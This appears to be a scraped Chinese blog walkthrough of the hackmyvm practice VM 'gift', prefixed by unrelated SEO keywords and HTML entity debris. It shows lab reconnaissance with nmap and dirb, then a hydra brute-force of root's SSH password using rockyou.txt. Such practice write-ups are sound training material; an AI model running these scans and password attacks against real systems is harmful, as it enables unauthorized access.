拼多多网站分析,购物网站开发教学视频,dw网页制作教程合集,贴吧做网站hackmyvm是一个平台#xff0c;包含了大量靶机#xff0c;类似于vulnhub、hackthebox等平台#xff0c;你可以在上面下载靶机#xff0c;进行渗透测试练习#xff0c;非常适合热爱黑客技术或从事渗透测试的人员。
#xff08;这段解释参考这篇文章#xff09;
下载安装…hackmyvm是一个平台包含了大量靶机类似于vulnhub、hackthebox等平台你可以在上面下载靶机进行渗透测试练习非常适合热爱黑客技术或从事渗透测试的人员。
这段解释参考这篇文章
下载安装
需要科学上网
下载地址https://hackmyvm.eu/machines/进去之后注册登陆账号
点击machines下载需要的虚拟机 靶机下载完成之后导入VMware
但是导入过程中出现了下面的报错 重启电脑什么的也没用应该是自己下的虚拟机有问题于是我重新下载了个虚拟机就可以成功运行了 靶机gift
因为靶机gift和kali都在VM中所以将两者都改为nat模式。
打开kali
查看kali ip
ifconfig
查出来是192.168.25.139靶机和kali都是nat模式用nmap扫描同网段的存活主机,这样就可以找到靶机的ip
nmap -sP 192.168.25.0/24查找靶机开放端口
nmap -A -p 1-1000 192.168.25.150访问80端口 扫描目录,无果
dirb http://192.168.25.150转战ssh因为没有告诉靶机ssh密码信息所以选择直接爆破
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://192.168.25.150有了密码之后远程连接,拿到flag
ssh root192.168.25.150
